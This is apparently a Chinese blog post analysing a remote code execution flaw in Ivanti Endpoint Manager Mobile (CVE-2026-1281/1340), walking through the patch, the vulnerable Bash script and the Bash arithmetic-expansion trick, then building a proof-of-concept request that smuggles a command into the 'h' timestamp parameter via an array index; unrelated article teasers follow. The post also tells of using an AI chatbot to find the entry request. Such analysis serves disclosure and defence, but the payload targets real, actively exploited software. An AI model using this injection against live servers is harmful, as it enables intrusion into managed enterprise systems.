当前位置: 首页 > article >正文

Ivanti EPMM RCE CVE-2026-1340/1281完整分析

article 2026/4/3 6:07:05
介绍近日,Ivanti公司披露了Ivanti Endpoint Manager Mobile (EPMM)中存在的代码注入漏洞(CVE-2026-1281和CVE-2026-1340)并确认已存在在野利用。该漏洞源于 Apache HTTPd 调用的 Bash 脚本在处理时间戳比较时未能有效过滤恶意参数导致攻击者可利用 Bash 算术扩展特性注入系统命令。分析首先拿到补丁包RPM的包那就好办了直接查看它执行了什么即可使用命令rpm -qp --scripts ivanti-security-update-1761642-1.0.0L-5.noarch.rpmemmm内容有点多不过根据已知条件该漏洞源于 Apache HTTPd 补丁包里面很容易看到关键的修改Apache HTTPd配置的命令/bin/sed -i \ -e s|RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url|RewriteMap mapAppStoreURL prg:/bin/java -cp /mi/bin AppStoreUrlMapper|g \ -e s|RewriteMap mapAftStoreURL prg:/mi/bin/map-aft-store-url|RewriteMap mapAftStoreURL prg:/bin/java -cp /mi/bin AFTUrlMapper|g \ /etc/httpd/conf.d/ssl.conf就是说把map-appstore-url和map-aft-store-url给换掉了不用是吧ok我们去看看这俩脚本是什么目录已经给了在mi/bin下我们直接进终端查一下map-appstore-url和map-aft-store-url是个bash脚本cat就可以直接看内容(另一个脚本内容差不太多就不展示了)。#!/bin/bash set -o nounset declare -x MI_DATE_COMMANDdate %Y-%m-%d--%H-%M-%S declare -x MI_DATE_FORMAT%Y-%m-%d--%H-%M-%S declare -r kScriptName$(basename $0) declare -r kScriptDirectory$(dirname $0) declare -r kLogFile/var/log/${kScriptName}.log declare -r kSaltFile/mi/files/appstore-salt.txt declare -r kScriptStartTimeSeconds$(date %s) declare -r kValidTimeStampLength${#kScriptStartTimeSeconds} declare -r kAftFileStoreDirectory/mi/files/aftstore # error codes that are used in /etc/httpd/conf.d/ssl.conf declare -r kPathTraversalAttemptedErrorCodec91bbeec40aff3fd3fe0c08044c1165a declare -r kLinkHashMismatchErrorCode44b2ff3cf69c5112061aad51e0f7d772 declare -r kTooLateErrorCodec6a0e7ca11208b4f11d04a7ee8151a46 declare -r kTooEarlyErrorCode80862895184bfa4d00b24d4fbb3d942f declare -r kKeyIndexOutOfBoundsErrorCodef74c27fce7d8e2fecd10ab54eda6bd85 declare -r kURLStructureInvalidErrorCodeb702087a848177d489a6891bd7869495 declare -r kTimestampLengthInvalidErrorCode2ecad569fdaa07e2b66ed2595cf7240f declare -r kLinkSpoofErrorCodecbfa488e9b08d4c5d7b3b2084ffb18e7 declare -r kLinkUsingOddTraversalErrorCodef489b91db387b684f56c07e7f5e4308b gShouldLogToFilefalse gSaltFileModificationTime0 gTestModefalse gErrorCode0 gErrorMessage declare -a gSaltArray( ) gCurrentSalt gHostname gPath gStartTime gEndTime if (( $# 0 )) ; then gTestModetrue fi #echo gTestMode${gTestMode} # information function log() { if ${gTestMode} ; then echo $MI_DATE_COMMAND -- ${kScriptName} -- ${1}: ${:2} else # do not log since it kills performance echo $($MI_DATE_COMMAND) -- ${kScriptName} -- ${1}: ${:2} ${kLogFile} fi } function logDebug() { if ${gTestMode} ; then echo $MI_DATE_COMMAND -- ${kScriptName} -- ${1}: ${:2} else # do not log since it kills performance ${gShouldLogToFile} echo $($MI_DATE_COMMAND) -- ${kScriptName} -- ${1}: ${:2} ${kLogFile} fi } # errorCode # information function logDenial() { local theCurrentDate$(MI_DATE_COMMAND) if ${gTestMode} ; then echo $theCurrentDate -- ${kScriptName} -- ${1}: denying: errorCode${2}: ${:3} else #echo $theCurrentDate -- ${kScriptName} -- ${1}: denying: errorCode${2}: ${:3} ${kLogFile} logger -t ${kScriptName} -i -p local0.warning $theCurrentDate -- ${1}: denying: errorCode${2}: ${:3} fi } log MAIN starting function dumpSaltArray() { log ${FUNCNAME} entered for theSalt in ${gSaltArray[]} ; do log ${FUNCNAME} theSalt$theSalt done } log MAIN after dumpSaltArray declaration function readSaltFile() { if [[ -f ${kSaltFile} ]] ; then theCurrentSaltModificationTime$(stat -c %Y ${kSaltFile}) logDebug ${FUNCNAME} theCurrentSaltModificationTime${theCurrentSaltModificationTime} theDeltaTime$(($theCurrentSaltModificationTime - $gSaltFileModificationTime)) logDebug ${FUNCNAME} theDeltaTime${theDeltaTime} if [[ ${theDeltaTime} -ne 0 ]] ; then log ${FUNCNAME} theDeltaTime${theDeltaTime} not zero; loading salt from kSaltFile${kSaltFile} gSaltArray( $(cat ${kSaltFile})) gSaltArray[0] gSaltFileModificationTime$theCurrentSaltModificationTime fi else log ${FUNCNAME} kSaltFile${kSaltFile} not found fi } log MAIN after readSaltFile declaration #readSaltFile #dumpSaltArray #readSaltFile function lookupSaltByIndex() { #echo $1 ${#gSaltArray[*]} if [ $1 -lt ${#gSaltArray[*]} ] ; then gCurrentSalt${gSaltArray[$1]} else gCurrentSalt fi logDebug ${FUNCNAME} theKeyIndex$1; gCurrentSalt$gCurrentSalt } log MAIN after lookupSaltByIndex declaration function verifyURLConsistency () { logDebug ${FUNCNAME} ${1} local ret # this is what we eventually echo and its the name of a file for httpd to send to the client or a pattern that Rewrite is aware of and kill the connection with the right HTTP error code #theAppStoreString${1%%:*} #echo ${theAppStoreString} #declare theOldIFS${IFS} local theArgumentArray # process what httpd gave us in $1 splitting on the _ IFS_ theArgumentArray(${1}) theAftStoreString${theArgumentArray[0]} theAftStoreAssetGUIDWithExtension${theArgumentArray[1]} gHostname${theArgumentArray[2]} theURLString${theArgumentArray[3]} #echo ${theAftStoreString} # process what mifs really gave us in $1 splitting on the , IFS, theAftStoreKeyValueArray(${theAftStoreString}) IFS${theOldIFS} if (( ${#theArgumentArray[]} ! 4 )) ; then ret${kURLStructureInvalidErrorCode} log ${FUNCNAME} ${ret} expecting 5 segments; actual${#theArgumentArray[]} fi if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*} logDebug ${FUNCNAME} theKey$theKey; theValue$theValue case ${theKey} in kid) gKeyIndex${theValue} ;; st) gStartTime${theValue} if (( ${#gStartTime} ! ${kValidTimeStampLength} )) ; then ret${kTimestampLengthInvalidErrorCode} fi ;; et) gEndTime${theValue} if (( ${#gEndTime} ! ${kValidTimeStampLength} )) ; then ret${kTimestampLengthInvalidErrorCode} fi ;; h) gHashPrefixString${theValue} ;; *) ret${kURLStructureInvalidErrorCode} logDenial ${FUNCNAME} ${ret} unknown presented key${theKey}; theValue${theValue} ;; esac done fi if [[ -z ${ret} ]] ; then lookupSaltByIndex ${gKeyIndex} if [[ -n ${gCurrentSalt} ]] ; then logDebug ${FUNCNAME} continuing: gCurrentSalt$gCurrentSalt theCurrentTimeSeconds$(date %s) logDebug ${FUNCNAME} theCurrentTimeSeconds${theCurrentTimeSeconds} #theCurrentTimeSeconds1336011206 #theCurrentTimeSeconds1336770818 #gHostnamecot-0000001.mobileiron.com #gHostnameqa42.mobileiron.com if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then logDebug ${FUNCNAME} continuing: not too early if [[ ${theCurrentTimeSeconds} -lt ${gEndTime} ]] ; then logDebug ${FUNCNAME} continuing: not too late # calculate the path gPath${theURLString/\/sha256:${theAftStoreString}/} theStringToHash${gCurrentSalt}${gHostname}${gPath}${gStartTime}${gEndTime} theAssetFile${theAftStoreAssetGUIDWithExtension} # the string to hash must end with the assetfile start end logDebug ${FUNCNAME} theStringToHash${theStringToHash} if [[ ${theStringToHash} *${theAssetFile}${gStartTime}${gEndTime} ]] ; then theSHA256Hash$(echo -n ${theStringToHash} | sha256sum) theSHA256Prefix${theSHA256Hash:0:64} # theSHA256Prefix${theSHA256Hash} logDebug ${FUNCNAME} theSHA256Hash$theSHA256Hash; theSHA256Prefix$theSHA256Prefix shopt -s nocasematch if [[ ${theSHA256Prefix} ${gHashPrefixString} ]] ; then logDebug ${FUNCNAME} hash matched if [[ ${theAssetFile} *..* ]] || [[ ${theAssetFile} .* ]] || [[ ${theAssetFile} /* ]]; then ret${kPathTraversalAttemptedErrorCode} logDenial ${FUNCNAME} ${ret} getting spoofed: ${theAssetFile} else ret${kAftFileStoreDirectory}/${theAftStoreAssetGUIDWithExtension} fi else ret${kLinkHashMismatchErrorCode} logDenial ${FUNCNAME} ${ret} link hash mismatch: theSHA256Prefix$theSHA256Prefix; gHashPrefixString${gHashPrefixString}; ${1} fi else ret${kLinkSpoofErrorCode} logDenial ${FUNCNAME} ${ret} link being spoofed: theStringToHash${theStringToHash}; requiredSuffix${theAppStoreSubDirectory}/${theAppStoreAssetGUID}${theAppStoreAssetExtension}${gStartTime}${gEndTime}; ${1} fi shopt -u nocasematch else ret${kTooLateErrorCode} logDenial ${FUNCNAME} ${ret} link too late: theCurrentTimeSeconds${theCurrentTimeSeconds}; ${1} fi else ret${kTooEarlyErrorCode} logDenial ${FUNCNAME} ${ret} link too early: theCurrentTimeSeconds${theCurrentTimeSeconds}; ${1} fi else ret${kKeyIndexOutOfBoundsErrorCode} logDenial ${FUNCNAME} ${ret} key index out of bounds: ${1} fi else ret${kURLStructureInvalidErrorCode} logDenial ${FUNCNAME} ${ret} URL not structurally correct: ${1} fi # tell httpd what file to send (or error message) echo ${ret} } if ${gTestMode} ; then readSaltFile verifyURLConsistency ${1} else logDebug MAIN looping readSaltFile while read theCurrentLine; do readSaltFile logDebug MAIN ${theCurrentLine} verifyURLConsistency ${theCurrentLine} done fi但内容太多了我们还是请AI老师帮我们统一分析一下AI老师帮我们分析并得到了一个传参请求然后我们还得去apache的配置文件看看入口路径是什么在/etc/httpd/conf.d/ssl.conf文件中找找相关的内容,由于配置文件内容太多了这里就不贴了我也懒得找还是让AI老师帮我们找找吧。deepseek老师还是太善解人意了直接给了一个标准请求/mifs/c/appstore/fob/3/1120/sha256:kid1,st1666663066,et1666670266,ha1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2/75dc90fe-6ae7-4377-913b-7248334d39dc.ipa但这些传参到bash中并没有找到明显的直接命令执行的点这时我们需要再理解一下bash脚本首先看bash脚本中的开头gKeyIndex gStartTime gEndTime gHashPrefixString gPath IFS, read -ra theAppStoreKeyValueArray脚本会用IFS,把传入的参数分割成数组theAppStoreKeyValueArray传参后是这样的数组[kid1, st1444444444, et1444444444, ha1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2]然后在下方有这样的一段循环if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*}它把传参的这些参数名和值循环赋值给了theKey和theValue然后又被赋值到全局变量gKeyIndex、gStartTime、gEndTime、gHashPrefixString中继续跟下去看看这些值在哪里用到。key参数赋值到了变量gKeyIndex最终在这里应用kAppStoreSaltFile/mi/files/appstore-salt.txt gSalt if [[ -f ${kAppStoreSaltFile} ]]; then gSalt$(sed -n ${gKeyIndex}p ${kAppStoreSaltFile}) if [[ -z ${gSalt} ]]; then ret${kSaltIndexInvalidErrorCode} logDenial ${FUNCNAME} ${ret} kid(${gKeyIndex}) is invalid (no salt found) fi else ret${kSaltFileMissingErrorCode} logDenial ${FUNCNAME} ${ret} Salt file ${kAppStoreSaltFile} not found fi它是用来读取/mi/files/appstore-salt.txt对应行的这个文件里面的hash值读取出来用来校验后续参数。st 参数最终赋值给了gStartTime分别在两个地方被调用kValidTimeStampLength10 case ${theKey} in st) gStartTime${theValue} if (( ${#gStartTime} ! ${kValidTimeStampLength} )); then ret${kTimestampLengthInvalidErrorCode} fi ;;这里判断了这个参数是否长度为10。theCurrentTimeSeconds$(date %s) if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then logDebug ${FUNCNAME} Current time(${theCurrentTimeSeconds}) start time(${gStartTime}) # ... else ret${kRequestExpiredErrorCode} logDenial ${FUNCNAME} ${ret} Start time(${gStartTime}) is in the future fi这里用来比较当前时间是否晚于请求开始时间。et 参数gEndTime和gStartTime的用处差不多也校验了长度和用于验证当前时间≤结束时间。h 参数gHashPrefixString是用于hash校验的值。看上去还是没有直观的命令执行的代码别急我们再引入一个知识点。首先给大家看一个脚本#!/bin/bash arr vararr[echo hacked ./hack_mht0] [[ 1 -gt $var ]] if [[ -f ./hack_mht ]]; then echo 执行成功 else echo 未执行 fibro们觉得这个脚本能成功执行命令吗答案为什么会这样捏因为在bash中数值比较功能可以解析array[index]这样的数值索引index会被优先解析为算数表达式比如array[11]会先计算11而bash又有一个命令替换的优先级规则如果你把array[11]改为array[echo 111]则先执行被反引号包裹的命令举例current_datedate echo 今天是: $current_date echo 当前目录: pwd显然在if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; 和if [[ ${theCurrentTimeSeconds} -lt ${gEndTime} ]] ; 中都存在这个条件但我们之前说了gStartTime和gEndTime都做了长度校验的必须为十位这就很鸡肋了那怎么样才能绕过这个问题呢回到最开始的定义变量与循环if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*}bash中使用theKey和theValue循环赋值传参的最后一个值为h所以theValue最后的值是就是h的值那现在就很有意思了gStartTime和gEndTime都有长度限制但h的值没有能不能让h的值走到if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then里面去应用数值索引命令替换呢可以的既然在bash中有变量theValueh传参那我们就直接让gStartTimetheValue最终流程可控h参数-theValue-gStartTime然后进入if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]];应用数值索引命令替换现在我们已经有了RCE的完整链条开始构造最终poc。kid参数为文件行数随便用个1st参数为theValue注意十位长度校验所以还需要再加两个空格et参数也参与比较也可作为theValue传参st与et随便一个地方设置为theValue都可以最后是h参数只需要满足array[index]即可。index部分的内容有了array部分写什么呢bash开头开启了set -o nounset这是严格模式严格模式下Bash 遇到未定义的变量会直接终止脚本执行直接从bash开头定义的那些空变量里面选一个比如gPath和gHostname都可以构造最终值gHostname[id /mi/bin/mht]

相关文章:

Ivanti EPMM RCE CVE-2026-1340/1281完整分析

介绍:近日,Ivanti公司披露了Ivanti Endpoint Manager Mobile (EPMM)中存在的代码注入漏洞(CVE-2026-1281和CVE-2026-1340),并确认已存在在野利用。该漏洞源于 Apache HTTPd 调用的 Bash 脚本在处理时间戳比较时,未能有效过滤恶意参数&#xf…...

编程日记 2026/4/3 6:07:05

Python➕PyQt5➕numpy➕pandas实现学生成绩分析系统(可视化)基于 Python + PyQt5 + Matplotlib + Pandas 实现的学生成绩分析系统框架

基于 Python PyQt5 Matplotlib Pandas 实现的学生成绩分析系统框架 Python➕PyQt5➕numpy➕pandas实现学生成绩分析系统(可视化) (源码项目文档详细README) !!代码注释非常详细 !&#xff01…...

编程日记 2026/4/3 6:07:05

Python MCP服务可观测性革命:OpenTelemetry+Prometheus+Grafana三件套零代码接入方案(附完整YAML模板)

第一章:Python MCP服务可观测性革命概述在微服务架构持续演进的今天,Python构建的MCP(Metrics, Context, and Propagation)服务正成为可观测性实践的关键载体。传统日志聚合与单点监控已难以应对跨服务调用链中上下文丢失、指标语…...

编程日记 2026/4/3 6:05:05

Qwen3.5-9B-AWQ-4bit镜像免配置教程:无需conda/pip,7860端口直连使用

Qwen3.5-9B-AWQ-4bit镜像免配置教程:无需conda/pip,7860端口直连使用 1. 开箱即用的视觉理解模型 今天要介绍的是一个能"看懂"图片的AI模型——Qwen3.5-9B-AWQ-4bit。这个模型最厉害的地方在于,它不仅能理解文字,还能…...

编程日记 2026/4/3 6:05:04

创建使用费曼学习技能,让 AI 帮你快速学习新领域知识(实战教程)

看完一篇文章、学习一个知识,当时感觉懂了。过三天,有人问你,你发现说不清楚。又或者准备运用这个知识,尝试解决问题,又觉得似是而非。这不是记忆力的问题,是你从来没有真正理解过它。有个方法专门解决这件…...

编程日记 2026/4/3 6:05:04

AI 时代做自媒体,他从方法论上就赢了绝大部分人

AI 时代做自媒体,他从方法论上就赢了绝大部分人 昨天刷到卡兹克的一篇文章,他分享了自己做内容三年总结的 10 条方法论。 看完之后我的感受是:这哥们从方法论上就赢了。 简单介绍一下卡兹克。他的公众号「数字生命卡兹克」是 AIGC 领域的头部 IP,新榜 AI 行业公众号排名…...

编程日记 2026/4/3 6:05:04

intv_ai_mk11应用场景:金融从业者用其生成监管政策要点摘要、投研报告初稿框架

intv_ai_mk11在金融领域的应用实践:政策摘要与投研报告生成 1. 金融从业者的AI助手需求 金融行业每天需要处理海量的监管政策和市场信息,传统人工处理方式面临三大挑战: 时效性压力:新政策发布后需要快速理解要点信息过载&…...

编程日记 2026/4/3 6:05:04

《常见三维CAD模型表示法》

表示法核心思想 / 定义数据结构 / 关键特点优点缺点CAD中的应用场景常见软件 / 文件格式B-rep (边界表示)通过精确记录物体的边界(顶点、边、面)及其拓扑关系(邻接、归属)来定义实体包含几何信息(点坐标、曲线方程、曲…...

编程日记 2026/4/3 6:03:03

华为eNSP实战:手把手教你用单臂路由打通不同VLAN,附排错命令清单

华为eNSP单臂路由实战:跨VLAN通信配置与深度排错指南 当企业网络规模扩大时,VLAN隔离是保障安全性和广播域控制的必要手段。但实际业务中,不同部门间的数据交互需求常常需要跨越VLAN边界。在华为认证体系HCIA和HCIP的实验环境中,单…...

编程日记 2026/4/3 6:03:03

AListFlutter(手机alist)——跨平台网盘挂载神器,安卓设备轻松管理云端文件

1. 为什么你需要AListFlutter? 作为一个经常需要在不同设备间切换办公的现代人,我深刻理解手机存储空间不足的痛苦。每次想用手机看个电影,都要先删掉几个APP;想拍个视频,又得清理微信缓存。直到发现了AListFlutter这个…...

编程日记 2026/4/3 6:03:03

别再自己造轮子了!用DJI Pilot 2 + 上云API,30分钟搞定无人机数据上云

30分钟极速对接:用DJI Pilot 2与上云API实现无人机数据云端整合 在智慧城市巡检或应急指挥场景中,实时获取无人机航拍画面与飞行数据往往是业务闭环的关键。传统方案需要投入数月时间开发定制化App,而大疆最新推出的上云API方案,让…...

编程日记 2026/4/3 6:03:03

LTE CDRX配置优化与日志解析实战

1. LTE CDRX功能基础与核心参数解析 CDRX(Connected Mode DRX)是LTE网络中终端设备在连接状态下实现节能的关键技术。想象一下你的手机就像个熬夜加班的程序员,如果一直盯着电脑屏幕(持续监听网络信号),电量…...

编程日记 2026/4/3 6:03:03

MinerU智能文档理解服务:专为高密度文本图像设计的轻量级解决方案

MinerU智能文档理解服务:专为高密度文本图像设计的轻量级解决方案 1. 引言:文档处理的智能化革命 在数字化办公时代,我们每天都要面对大量PDF文档、扫描件和图像资料。这些文件往往包含复杂的版面结构:多栏排版、嵌套表格、数学…...

编程日记 2026/4/3 6:01:03

Comsol 热 - 流 - 固 - 损伤耦合模拟分析:THMD 模型实践

Comsol热-流-固-损伤耦合模拟分析,THMD热-流-固-损伤耦合模型,在这个模型里面考虑了温度场、应力场、压力场和损伤场,采用的是Comsol内置的接口建模 整个模型呈正方形,内部开一个圆孔 在圆孔内壁施加高压低温流体,模型…...

编程日记 2026/4/3 6:01:03

Chord视觉定位模型实战案例:自动驾驶道路元素(车道线/交通灯/行人)定位

Chord视觉定位模型实战案例:自动驾驶道路元素(车道线/交通灯/行人)定位 在真实自动驾驶场景中,单纯依赖传统目标检测模型往往面临泛化能力弱、小目标漏检、遮挡鲁棒性差等问题。而Chord——这个基于Qwen2.5-VL的多模态视觉定位服…...

编程日记 2026/4/3 6:01:03

实战分享:如何用星图平台零代码私有化Qwen3-VL:30B,并接入飞书实现智能对话

实战分享:如何用星图平台零代码私有化Qwen3-VL:30B,并接入飞书实现智能对话 1. 项目概述与价值 在当今企业智能化转型的浪潮中,如何快速部署私有化大模型并实现业务场景落地,成为许多技术团队面临的挑战。本文将详细介绍如何通过…...

编程日记 2026/4/3 6:01:03

ESP32-S3双下载方案对比:VSCode一键烧录 vs 乐鑫Flash工具实操

ESP32-S3双下载方案深度评测:VSCode高效开发 vs 乐鑫工具链生产级部署 1. 开发环境配置与工具链解析 对于ESP32-S3开发者而言,选择正确的开发工具直接影响项目效率。当前主流方案可分为两类:基于VSCode的集成化开发环境和乐鑫官方Flash下载工…...

编程日记 2026/4/3 6:01:02

AI开发效率翻倍:TensorFlow-v2.9镜像完整开发环境实测体验

AI开发效率翻倍:TensorFlow-v2.9镜像完整开发环境实测体验 你是不是也经历过这样的场景?新项目启动,满怀激情准备大干一场,结果第一天就卡在了环境配置上。CUDA版本不对、依赖库冲突、Python环境混乱……光是让TensorFlow成功识别…...

编程日记 2026/4/3 5:59:01

Qwen3.5-9B训练复现:从SFT到RLHF的全流程开源实践指南

Qwen3.5-9B训练复现:从SFT到RLHF的全流程开源实践指南 1. 项目概述 Qwen3.5-9B是一个拥有90亿参数的开源大语言模型,具备强大的逻辑推理、代码生成和多轮对话能力。该模型支持多模态理解(图文输入)和长上下文处理(最…...

编程日记 2026/4/3 5:59:01

Net/Net Core微信公众号上传图片永久图片素材和内容中图片素材不能用MultipartFormDataContent的坑

测试了N次,不能用net自带的 MultipartFormDataContent,否则微信公众号会一直报错41005错误,具体原因不详,只能拼装head字符串实现,下面是封装好的上传永久素材和临时图片素材的方法,下面为测试好的代码&…...

编程日记 2026/4/3 5:59:01

AgentCPM-Report轻量化部署:Pixel Epic智识终端GPU显存优化方案

AgentCPM-Report轻量化部署:Pixel Epic智识终端GPU显存优化方案 1. 项目背景与核心价值 Pixel Epic智识终端是一款基于AgentCPM-Report大模型构建的创新研究辅助工具。它将枯燥的科研报告撰写过程转化为一场像素风格的RPG冒险,让用户在游戏化的交互体验…...

编程日记 2026/4/3 5:59:01

忍者像素绘卷开源镜像部署:支持国产昇腾芯片的适配可行性分析

忍者像素绘卷开源镜像部署:支持国产昇腾芯片的适配可行性分析 1. 项目概述与技术特点 忍者像素绘卷是一款基于Z-Image-Turbo深度优化的图像生成工作站,专为二次元风格和复古像素艺术设计。该项目融合了现代AI图像生成技术与16-bit游戏美学,…...

编程日记 2026/4/3 5:59:00

【研报277】国内新能源乘用车市场深度分析报告:2026年市场竞争格局与品牌分化趋势

本报告提供限时下载,请查看文后提示以下仅为报告部分内容:摘要:2026年1-2月国内新能源乘用车市场呈现结构性分化,国产新能源累计销量99.63万辆,同比下滑27.05%,纯电车型跌幅最深,增程式混动相对…...

编程日记 2026/4/3 5:57:00

JwChat避坑指南:Vue聊天组件这些隐藏配置能让体验提升200%

JwChat深度优化实战:解锁Vue聊天组件200%体验升级的隐藏技巧 当你已经用JwChat实现了基础聊天功能,却发现消息列表卡顿、表情包显示错位、历史加载闪烁——这些细节问题正在蚕食用户体验。作为基于Vue的轻量级聊天组件,JwChat的官方文档并未揭…...

编程日记 2026/4/3 5:57:00

Qwen3.5-9B生产环境实践:高并发请求处理+响应延迟优化策略

Qwen3.5-9B生产环境实践:高并发请求处理响应延迟优化策略 1. 项目概述与核心能力 Qwen3.5-9B是一款拥有90亿参数的开源大语言模型,在多个领域展现出卓越的性能。这个模型特别适合需要处理复杂任务的生产环境,因为它具备以下核心能力&#x…...

编程日记 2026/4/3 5:57:00

LingBot-Depth模型优化技巧:处理高分辨率图像的实用方法

LingBot-Depth模型优化技巧:处理高分辨率图像的实用方法 你是不是遇到过这样的情况:拿到一张高分辨率的室内场景照片,兴冲冲地丢给深度估计模型,结果要么显存爆炸,要么生成的效果图边缘模糊、细节丢失,完全…...

编程日记 2026/4/3 5:56:59

从Linux内核页表映射到用户态HugeTLB池:金融级C++内存池的7层硬件协同优化法(仅限TOP20对冲基金内部文档解密版)

第一章:金融高频交易C内存池的硬件协同优化全景图在纳秒级响应要求的金融高频交易系统中,C内存池不再仅是软件抽象层的性能补丁,而是CPU缓存子系统、内存控制器与DRAM物理特性的协同执行面。现代x86-64平台(如Intel Ice Lake-SP或…...

编程日记 2026/4/3 5:56:59

Qwen3-ForcedAligner-0.6B在美赛中的应用:跨语言访谈数据分析

Qwen3-ForcedAligner-0.6B在美赛中的应用:跨语言访谈数据分析 1. 引言 在美国大学生数学建模竞赛(MCM/ICM)中,参赛队伍经常面临一个棘手问题:如何高效处理来自不同国家、不同语言的学术访谈数据?传统方法…...

编程日记 2026/4/3 5:54:59

Ostrakon-VL 提示词(Prompt)工程高级技巧:控制输出格式与风格

Ostrakon-VL 提示词(Prompt)工程高级技巧:控制输出格式与风格 1. 引言:为什么需要掌握Prompt工程? 如果你用过Ostrakon-VL这类多模态大模型,可能遇到过这样的困扰:明明输入了很详细的描述&…...

编程日记 2026/4/3 5:54:59

防晒霜真的防晒吗?揭秘SPF值背后的“光“标准

盛夏将至,防晒霜成为每个人的随身必备。你是否想过:瓶身上标注的 SPF 50、PA 是如何测出来的?为什么有些防晒霜涂了还是会晒黑?所谓的"防水防汗"真的有科学依据吗?这些问题的答案,都藏在一个精密…...

编程日记 2026/4/3 5:54:59